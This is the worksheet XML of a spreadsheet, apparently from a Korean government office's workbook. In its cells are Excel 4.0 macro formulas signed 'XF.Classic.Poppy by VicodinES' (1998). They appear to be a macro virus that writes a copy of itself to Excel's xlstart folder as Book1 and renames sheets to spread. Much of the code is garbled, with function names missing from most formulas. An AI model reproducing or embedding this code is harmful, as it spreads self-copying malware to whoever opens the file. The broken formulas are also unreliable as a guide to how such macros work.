        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="12.75">
      <c r="A8" s="211" t="s">
        <v>304</v>
      </c>
      <c r="C8" s="209" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="12.75">
      <c r="A9" s="212" t="s">
        <v>305</v>
      </c>
      <c r="C9" s="209" t="b">
        <f>FALSE</f>
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="12.75">
      <c r="A10" s="211" t="s">
        <v>306</v>
      </c>
      <c r="C10" s="209" t="e">
        <f>A21</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="213" t="s">
        <v>307</v>
      </c>
      <c r="C11" s="209" t="b">
        <f>"6:30:00 PM","Hello"</f>
        <v>1</v>
      </c>
    </row>
    <row r="12" ht="12.75">
      <c r="C12" s="209" t="b">
        <f>"6:30:00 AM","Morning"</f>
        <v>1</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1">
      <c r="C13" s="209" t="b">
        <f>,"Poppy",TRUE</f>
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="208" t="s">
        <v>308</v>
      </c>
      <c r="C14" s="214" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="15" ht="12.75">
      <c r="A15" s="209" t="b">
        <f>"XF.Classic.Poppy by VicodinES",2</f>
        <v>1</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1">
      <c r="A16" s="209" t="b">
        <f>"ⓒ 1998 The Narkotic Network",2</f>
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="A17" s="214" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C17" s="208" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="18" ht="12.75">
      <c r="C18" s="209" t="b">
        <f>$A$3(GET.WORKSPACE(32)&amp;"\xlstart\Book1.")</f>
        <v>1</v>
      </c>
    </row>
    <row r="19" ht="12.75">
      <c r="C19" s="209" t="b">
        <f>"Document_array",</f>
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="12.75">
      <c r="A20" s="215" t="s">
        <v>310</v>
      </c>
      <c r="C20" s="209" t="b">
        <f>$A$1INDEX(,2)</f>
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="12.75">
      <c r="A21" s="216">
        <f>IF(A3="Book1.",0,99)</f>
        <v>0</v>
      </c>
      <c r="C21" s="209" t="b">
        <f>$A$2INDEX(,1)</f>
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="12.75">
      <c r="A22" s="209" t="b">
        <f>TRUE,</f>
        <v>1</v>
      </c>
      <c r="C22" s="209" t="b">
        <f>$A$4GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy")</f>
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="12.75">
      <c r="A23" s="209" t="b">
        <f>IF(A21=0)</f>
        <v>1</v>
      </c>
      <c r="C23" s="214" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="24" ht="12.75">
      <c r="A24" s="209" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="25" ht="12.75">
      <c r="A25" s="209" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="A26" s="209" t="b">
        <f>1</f>
        <v>1</v>
      </c>
      <c r="C26" s="217" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="12.75">
      <c r="A27" s="209" t="b">
        <f>1</f>
        <v>1</v>
      </c>
      <c r="C27" s="209" t="e">
        <f>C19</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="12.75">
      <c r="A28" s="209" t="b">
        <f>1</f>
        <v>1</v>
      </c>
      <c r="C28" s="209" t="b">
        <f>TRUE,</f>
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="12.75">
      <c r="A29" s="209" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C29" s="209" t="e">
        <f>IF(A4=3)</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="12.75">
      <c r="A30" s="209" t="e">
        <f>C18</f>
        <v>#N/A</v>
      </c>
      <c r="C30" s="209" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:3" ht="12.75">
      <c r="A31" s="209" t="b">
        <f>"XL4Poppy",A1</f>
        <v>1</v>
      </c>
      <c r="C31" s="209" t="b">
        <f>FALSE</f>
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:3" ht="12.75">
      <c r="A32" s="209" t="b">
        <f>"Sheet3","Sheet99"</f>
        <v>1</v>
      </c>
      <c r="C32" s="209" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:3" ht="12.75">
      <c r="A33" s="209" t="b">
        <f>"Sheet1","Sheet3"</f>
        <v>1</v>
      </c>
      <c r="C33" s="209" t="e">
        <f>C19</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="34" spans="1:3" ht="12.75">
      <c r="A34" s="209" t="b">
        <f>"Sheet99","Sheet1"</f>
        <v>1</v>
      </c>
      <c r="C34" s="209" t="e">
        <f>"XL4Poppy",A1</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="12.75">
      <c r="A35" s="209" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>1</v>
      </c>
      <c r="C35" s="209" t="e">
        <f>=</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="12.75">
      <c r="A36" s="209" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C36" s="214" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="37" ht="12.75">
      <c r="A37" s="209" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="38" ht="12.75">
      <c r="A38" s="209" t="b">
        <f>=</f>
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="12.75">
      <c r="A39" s="209" t="b">
        <f>A3</f>
        <v>1</v>
      </c>
      <c r="C39" s="216" t="b">
        <f>"XF.Classic.Poppy"</f>
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="12.75">
      <c r="A40" s="209" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C40" s="209" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="12.75">
      <c r="A41" s="214" t="b">
        <f>=</f>
        <v>1</v>
      </c>
      <c r="C41" s="214" t="b">
        <f>=</f>
        <v>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국가보훈처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진영숙</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>진영숙</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-12-27T01:40:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-01-07T02:31:03Z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